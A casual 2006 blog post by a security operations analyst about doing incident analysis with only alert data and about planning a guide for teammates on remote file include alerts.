work and IT @ 03 Dec 2006 08:43 am by ayoi
Hehehe, this topic is not concern about those who work days and nites at harzardous place. It is mainly on my team working days and nites doing our work with less resources to do our analysis properly.
As I’ve learnt, to do a proper analysis on certain alerts/incidents/events, we shud analyze (if available) full content data ( prolly kinda hard for large scale, high bandwidth, limited storage networks), session data, statistical data (better network traffic instead of alerts statistic data I presume) and alerts data. Currently what all of us had is alert data even for incident investigation/analysis. But The Client report request sometimes beyond than whut we can provide. Just imagine whut it would be when incident like this happens
As I’m going to leave this place by the end of this year, perhaps I shud leave some guide to my teammate on how to provide/do “analysis” on certain events/incident starting with remote include path alert.
p/s : Ok i know I am the one who furiously rubbished the request of doing the SOP for alerts analysis. (There’re thousands of them and how the hell can I do that?) But this is different. I’m doing it one at a time and I can take my own sweet time. Maybe one day I shud rename my blog to tataosecurity. tatao = tatau = tak tau. 
